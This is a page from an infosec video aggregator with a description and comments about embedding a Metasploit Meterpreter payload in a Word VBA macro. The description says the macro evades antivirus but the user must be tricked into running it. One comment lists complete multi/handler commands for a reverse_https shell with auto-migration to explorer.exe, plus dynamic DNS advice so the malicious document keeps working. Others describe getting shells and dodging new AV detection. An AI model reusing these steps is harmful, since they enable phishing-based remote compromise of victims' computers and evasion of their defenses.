Description: Using metasploit to create the code and then setting up a macro within a word document. This will not be detected by AV however you need to trick the user into running the macro. Also migrate!
Tags: metasploit , macro , vba , panda ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Nice, macro is fun ;)
Now migrating to another process fast is the challenge ! but wait there is an easier way.
When setting up your multi/handler use the following option
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 443
set LHOST <IP or="" Hostname="">
set AutoRunScript "migrate -n explorer.exe"
exploit -j
Now once a connection is established athe auto run script will use migrate and with the -n it will look for a process name in this case explorer.exe and migrate to it.
using hostnames is much better if your IP address changes a lot. look up free dynamic DNS service. with a dynamic DNS service you get a hostname which never changes but you can always change its IP address, that way you wont need to always make a macro document every time your IP changes.
thanks again Hackett :D love ur videos!
@Hackett: by the way those steps are for people new to this! forgot to mention that in the first comment :)
This was my hack lesson for today :) I followed your steps and I was has able the get a Meterpreter session first shot (On test VM). It's always fun to discover new ways of executing payloads.
Excellent video, I look forward to seeing more like it.
Thanks!
@j0k3rr - works like a charm. I usually use Initialautorunscript for just a single command.
@PoisonReverse - glad to hear it dude :) and thanks!
the creation of the docx was not clear enough to me, so i might done some mistakes, but visual studio is calling an error, pointing at Sub Auto_Open()
no sessions:(:(:(:(:(:(:(
i've also noticed that when the document is opened it will create new hidden doc with ~$... (which maybe irrelevant)
i am using MSword 2007
i meant the part 1:40 -1:48
Great Video! One I will come back to again.
Curious how well does this work with NAT on an outside network? Is the set up pretty much the same but with the external ip address and then set the router up to receive all traffic to port 443 to designated internal ip address. I am going to play with this a little bit more. Thanks again for the tutorial.
Works extremely well with NAT.
Yeah I played with some settings and sent it to my friend had shell real fast. Really like this
make sure you auto migrate as well otherwise you lose your shell as soon as it's closed. As of this week Symantec now detects this. Time to change it up again.
not really understanding the auto migrate ill have to research this some.
researched it some more going to try this again with the >post/windows/manage/migrate command and see if keeps it open this time thanks for the help.